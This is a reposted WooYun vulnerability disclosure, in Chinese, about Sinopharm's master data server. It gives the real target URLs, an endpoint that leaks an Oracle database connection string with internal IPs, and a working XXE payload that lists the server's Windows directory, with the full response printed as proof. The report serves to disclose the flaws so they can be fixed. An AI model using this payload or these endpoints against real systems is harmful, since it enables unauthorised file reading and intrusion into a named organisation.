神刀安全网

漏洞标题: 国药集团主数据服务器系统存在多个漏洞

漏洞详情

披露状态:

2016-04-18: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

国药集团主数据服务器系统存在多个漏洞

详细说明:

存在漏洞服务器

http://mdm.sinopharm.com

漏洞一,数据库配置信息泄露

code 区域
http://mdm.sinopharm.com//uapws/service/nc.itf.ses.inittool.PortalSESInitToolService

code 区域
jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 172.1.4.5)(PORT = 1521))(ADDRESS = (PROTOCOL = TCP)(HOST = 172.1.4.38)(PORT = 1521))(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = gydb)(FAILOVER_MODE=(TYPE = SELECT)(METHOD = BASIC)(RETIRES = 20)(DELAY = 15))))

漏洞二,任意文件目录读取

http://mdm.sinopharm.com/uapws/soapFormat.ajax

漏洞参考: WooYun: 用友软件企业门户xxe漏洞[测试前用友官域]

漏洞证明:

code 区域
msg=<!DOCTYPE foo [<!ENTITY xxe1two SYSTEM /"file:///c:/windows//"> ]>
<soap:Envelope xmlns:soap=/"http://schemas.xmlsoap.org/soap/envelope//">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server%26xxe1two%3b</faultcode>
<faultstring>java.lang.RuntimeException: can not find datasource: ?</faultstring>
</soap:Fault>
</soap:Body>
</soap:Envelope>%0a, SOAP获取的数据如下:
<?xml version=/"1.0/" encoding=/"UTF-8/"?>
<!DOCTYPE foo [
<!ENTITY xxe1two SYSTEM /"file:///c:/windows//" >
]>
<soap:Envelope xmlns:soap=/"http://schemas.xmlsoap.org/soap/envelope//">
<soap:Body>
<soap:Fault>
<faultcode>soap:ServerAppCompat
AppPatch
assembly
bfsvc.exe
Boot
bootstat.dat
Branding
Cursors
debug
diagnostics
DigitalLocker
Downloaded Program Files
DtcInstall.log
en-US
explorer.exe
Fonts
fveupdate.exe
Globalization
Help
HelpPane.exe
hh.exe
IME
inf
Installer
L2Schemas
LiveKernelReports
Logs
Media
mib.bin
Microsoft.NET
ModemLogs
msdfmap.ini
Offline Web Pages
Panther
PFRO.log
PLA
PolicyDefinitions
regedit.exe
Registration
RemotePackages
rescache
Resources
SchCache
schemas
security
ServerEnterprise.xml
ServerWeb.xml
ServiceProfiles
servicing
Setup
setupact.log
setuperr.log
SoftwareDistribution
Speech
splwow64.exe
SysMsiCache
system
system.ini
System32
SysWOW64
TAPI
Tasks
Temp
tracing
TSSysprep.log
Vss
Web
win.ini
WindowsShell.Manifest
WindowsUpdate.log
winhlp32.exe
winsxs
write.exe
zh-CN
</faultcode>
<faultstring>java.lang.RuntimeException: can not find datasource: ?</faultstring>
</soap:Fault>
</soap:Body>
</soap:Envelope>

修复方案:

更新用友软件的安全问题

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 国药集团主数据服务器系统存在多个漏洞

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址